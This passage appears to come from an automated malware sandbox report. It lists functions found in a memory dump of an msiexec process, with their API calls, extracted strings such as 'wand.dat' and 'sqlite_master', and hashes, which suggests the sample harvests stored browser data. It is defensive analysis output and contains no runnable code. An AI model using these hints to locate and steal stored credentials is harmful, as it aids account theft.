                                                                                                      • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                      • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                      • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                      APIs
                                                                                                        • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                      Strings
                                                                                                      • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                      • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                      • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                      • API String ID: 1297977491-2063813899
                                                                                                      • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                      • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                      • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                      • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040560C
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                        • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                      • String ID: *.*$dat$wand.dat
                                                                                                      • API String ID: 2618321458-1828844352
                                                                                                      • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                      • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                      • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                      • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                      • wcslen.MSVCRT ref: 00410C74
                                                                                                      • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                                      • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                      • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1549203181-0
                                                                                                      • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                      • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                      • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                      • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00412057
                                                                                                        • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                      • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                      • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 3550944819-0
                                                                                                      • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                      • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                      • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                      • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                      APIs
                                                                                                      • free.MSVCRT ref: 0040F561
                                                                                                      • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                      • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$free
                                                                                                      • String ID: g4@
                                                                                                      • API String ID: 2888793982-2133833424
                                                                                                      • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                      • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                      • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                      • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                      • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: @
                                                                                                      • API String ID: 3510742995-2766056989
                                                                                                      • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                      • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                      • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                      • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                      APIs
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                      • memset.MSVCRT ref: 0040AF18
                                                                                                      • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1865533344-0
                                                                                                      • Opcode ID: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                                                      • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                      • Opcode Fuzzy Hash: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                                                      • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004144E7
                                                                                                        • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                        • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                      • memset.MSVCRT ref: 0041451A
                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 1127616056-0
                                                                                                      • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                      • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                      • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                      • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                      • memset.MSVCRT ref: 0042FED3
                                                                                                      • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID: sqlite_master
                                                                                                      • API String ID: 438689982-3163232059
                                                                                                      • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                      • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                      • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                      • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                      APIs
                                                                                                      • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                      • wcscpy.MSVCRT ref: 00414DF3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3917621476-0
                                                                                                      • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                      • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                      • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                      • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                      • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                      • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                      • _snwprintf.MSVCRT ref: 0041100C
                                                                                                      • wcscat.MSVCRT ref: 0041101F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 822687973-0
                                                                                                      • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                      • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                      • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                      • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                      APIs
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76F8DF80,?,0041755F,?), ref: 00417452
                                                                                                      • malloc.MSVCRT ref: 00417459
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,76F8DF80,?,0041755F,?), ref: 00417478
                                                                                                      • free.MSVCRT ref: 0041747F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 2605342592-0
                                                                                                      • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                      • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                      • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                      • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                      • RegisterClassW.USER32(?), ref: 00412428
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                      • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2678498856-0
                                                                                                      • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                      • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                      • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                      • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Item
                                                                                                      • String ID:
                                                                                                      • API String ID: 3888421826-0
                                                                                                      • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                      • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                      • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                      • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00417B7B
                                                                                                      • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                      • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                      • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$ErrorLastLockUnlockmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 3727323765-0
                                                                                                      • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                      • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                      • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                      • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040F673
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                      • strlen.MSVCRT ref: 0040F6A2
                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2754987064-0
                                                                                                      • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                      • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                      • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                      • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040F6E2
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                      • strlen.MSVCRT ref: 0040F70D
                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2754987064-0
                                                                                                      • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                      • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                      • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                      • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00402FD7
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                      • strlen.MSVCRT ref: 00403006
                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2754987064-0
                                                                                                      • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                      • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                      • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                      • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcscpy$CloseHandle
                                                                                                      • String ID: General
                                                                                                      • API String ID: 3722638380-26480598
                                                                                                      • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                      • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                      • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                      • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                      APIs
                                                                                                        • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                        • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                        • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                      • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                      • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 764393265-0
                                                                                                      • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                      • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                      • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                      • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                      APIs
                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Time$System$File$LocalSpecific
                                                                                                      • String ID:
                                                                                                      • API String ID: 979780441-0
                                                                                                      • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                      • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
